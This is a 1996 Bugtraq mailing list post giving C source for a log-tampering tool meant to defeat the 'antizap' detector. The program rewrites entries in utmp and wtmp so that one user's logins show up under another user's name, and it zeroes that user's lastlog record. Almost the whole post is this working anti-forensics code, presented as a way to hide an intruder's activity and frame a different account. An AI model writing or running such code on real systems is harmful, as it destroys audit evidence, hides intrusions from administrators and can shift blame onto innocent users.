[3422] in bugtraq
no subject (file transmission)
daemon@ATHENA.MIT.EDU (Lone Wolf)
Wed Oct 9 15:19:30 1996
Date: Wed, 9 Oct 1996 23:26:26 +0500
Reply-To: Lone Wolf <danny@protocol.ece.iisc.ernet.in>
From: Lone Wolf <danny@protocol.ece.iisc.ernet.in>
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@NETSPACE.ORG>
hi here is a cure to antizap instead of chucking in null bytes in w/utmp
replace it with the name of some other user i think this should do
to fool the antizap programme
danny
#include <sys/types.h>
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <utmp.h>
#include <lastlog.h>
#include <pwd.h>
#define bzero(x, y) memset(x, 0, y)
int f;
kill_tmp(name,who,whom)
char *name,
*who,
*whom;
{
struct utmp utmp_ent,utmp_new;
if ((f=open(name,O_RDWR))>=0) {
while(read (f, &utmp_new, sizeof (utmp_new))> 0 )
if (!strncmp(utmp_new.ut_name,whom,strlen(whom)))
{
printf("ut_line :%s\n",utmp_new.ut_line);
close(f);
}
}
if ((f=open(name,O_RDWR))>=0) {
while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )
if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
strncpy(utmp_ent.ut_user,whom,8);
lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);
write (f, &utmp_ent, sizeof (utmp_ent));
}
close(f);
}
}
void kill_lastlog(who)
char *who;
{
struct passwd *pwd;
struct lastlog newll;
if ((pwd=getpwnam(who))!=NULL) {
if ((f=open("/usr/adm/lastlog", O_RDWR)) >= 0) {
lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);
bzero((char *)&newll,sizeof( newll ));
write(f, (char *)&newll, sizeof( newll ));
close(f);
}
} else printf("%s: ?\n",who);
}
main(argc,argv)
int argc;
char *argv[];
{
if (argc==3) {
kill_tmp("/etc/utmp",argv[1],argv[2]);
kill_tmp("/usr/adm/wtmp",argv[1],argv[2]);
kill_lastlog(argv[1]);
printf("The Lone Wolf Strikes ......!\n");
printf("%s changed to %s ......!\n",argv[1],argv[2]);
} else
{ printf("Usage: filename uid_to_be_replaced required_uid.\n");
exit(1);
}
}
